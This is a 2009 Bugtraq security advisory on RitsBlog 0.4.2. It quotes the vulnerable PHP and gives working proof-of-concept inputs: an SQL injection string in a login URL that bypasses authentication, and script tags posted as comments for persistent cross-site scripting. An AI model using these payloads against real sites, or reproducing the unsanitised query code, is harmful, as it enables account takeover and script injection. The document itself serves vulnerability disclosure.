RitsBlog 0.4.2 (Authentication Bypass) SQL Injection Vulnerability / XSS Persistent Vulnerability
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
- Subject: RitsBlog 0.4.2 (Authentication Bypass) SQL Injection Vulnerability / XSS Persistent Vulnerability
- From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
- Date: Mon, 2 Mar 2009 22:52:02 +0100
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=OMg7jj069Zta/mPGjSPY97eDy/28wS05m9KHYu+1w4s=; b=qQvIrLOoGKjISAwXbIUukND39KD+95L5Ulg7mYgQbCkDYT4y6VNstLs181+dwXAoG9 W4xCKJh7IX7GJSgS0Lhl+sEQp7q/cwiUUIDRe0JXFvhLAeBUQVVnAWOArPNsNkReWXR0 9g4p4O0F5xauVXSlxyqS3ILzQeKoz+jA7KBWI=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=l1VukaSLHGoPCMSXiMjEz7vZfwvxVOFIPSenxBalefEzkTCa3G79JgYuHNnlBjer5s hdPSJrOJUqE1RsUdTDcNmEwe9TsPN3EsKP7URLrvm/+ZG/kEJk3r2tBuZ16NvXHDGaD4 idxqpDPbvGrQJm5kVLc9dnVjqK0DIuvMLnFJs=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
******* Salvatore "drosophila" Fresta *******
[+] Application: RitsBlog
[+] Version: 0.4.2
[+] Website: http://sourceforge.net/projects/ritsblog/
[+] Bugs: [A] SQL Injection
[B] XSS Persistent
[+] Exploitation: Remote
[+] Date: 02 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
[+] Menu
- [1] Bugs
- [2] Code
- [3] Fix
*************************************************
[+] Bugs
- [A] SQL Injection
[-] Requisites: magic_quotes_gpc = off
[-] File affected: ritsBlogAdmin.class.php
This blog is entirely vulnerable to SQL Injection.
The following is the vulnerable query that can be
used to bypass authentication.
In jobs.php:
if ($_GET[j] == "login"){
if ($blog -> login($_GET[p])){
$_SESSION[loggedin] = "ok";
$_SESSION[userID] = $blog -> userID;
echo "Password found. Loging in...";
....
In ritsBlogAdmin.class.php:
function login($password){
global $db;
$sql = "select * from users where secretWord = '$password'";
...
}
- [B] XSS Persistent
[-] Requisites: none
[-] File affected: ritsBlogAdmin.class.php
In jobs.php:
if ($_POST[j] == "addComment"){
echo $blog -> addComment($_POST[id], $_POST[name],
$_POST[body]);
}
In ritsBlogAdmin.class.php
function addComment($id, $name, $body){
global $db;
$sql = "INSERT INTO comments (name, postID, date, text)
VALUES('" . addslashes($name) . "','" . $id . "',NOW(),'" .
addslashes($body) . "')";
...
}
*************************************************
[+] Code
- [A] SQL Injection
http://www.site.com/path/blogAdmin/jobs.php?j=login&p=1'or'1'='1
- [B] XSS Persistent
It is possible using forms in the index.php or
to send over POST method the following values:
?j=addComment&id=54&name=myname&body=<script>alert('XSS');</script>
or
?j=addComment&id=54&name=<script>alert('XSS');</script>&body=body
*************************************************
[+] Fix
No fix.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351